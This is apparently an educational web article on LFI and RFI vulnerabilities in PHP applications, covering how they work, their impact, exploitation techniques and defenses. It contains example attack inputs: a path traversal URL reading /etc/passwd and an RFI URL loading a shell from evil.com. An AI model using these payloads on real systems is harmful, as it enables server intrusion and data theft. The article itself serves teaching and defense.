Views

LFI / RFI Attacks

1 Global Definition

File Inclusion vulnerabilities occur when a web application dynamically includes files without proper validation. They are divided into:

  • LFI (Local File Inclusion): The attacker includes files already present on the target server.
  • RFI (Remote File Inclusion): The attacker includes external files hosted on a remote server they control.

Both can lead to information disclosure, code execution, or full server compromise.

1.1 How LFI Works

LFI occurs when the application uses user input in file paths without sanitization.

http://example.com/index.php?page=about.php

An attacker can manipulate the page parameter:

http://example.com/index.php?page=../../etc/passwd

This can expose sensitive files like /etc/passwd on Linux, revealing user accounts.

1.2 How RFI Works

RFI occurs when the application loads files from external sources. Example:

http://example.com/index.php?page=http://evil.com/shell.txt

The malicious file might contain PHP code that executes commands on the target server, leading to a remote shell.

1.3 Real-World Impact

  • Information Disclosure: Attackers read sensitive files such as config files.
  • Privilege Escalation: LFI may allow access to log files that can be injected with malicious code.
  • Remote Code Execution: With RFI, attackers execute arbitrary code from external servers.
  • Large-Scale Breaches: Many high-profile PHP applications (WordPress plugins, Joomla, etc.) have been exploited via RFI.

1.4 Common Exploitation Techniques

  • Directory Traversal to read sensitive files.
  • Null Byte Injection to bypass file extension checks.
  • Injecting PHP code into server logs and loading them via LFI.
  • Hosting malicious payloads remotely for RFI exploitation.

1.5 Defense Strategies

  • Never include files based on user input.
  • Use whitelisting instead of blacklisting.
  • Disable allow_url_include in php.ini.
  • Apply input validation and sanitization for parameters.
  • Restrict application access with least privilege policies.

1.6 Why It Matters

LFI and RFI remain among the most critical vulnerabilities in PHP and web applications. They can lead to full server compromise, data theft, and even supply chain attacks. These flaws are regularly highlighted in the OWASP Top 10.

Share and Join the Discussion

You need to be logged in to participate in this discussion.

×
×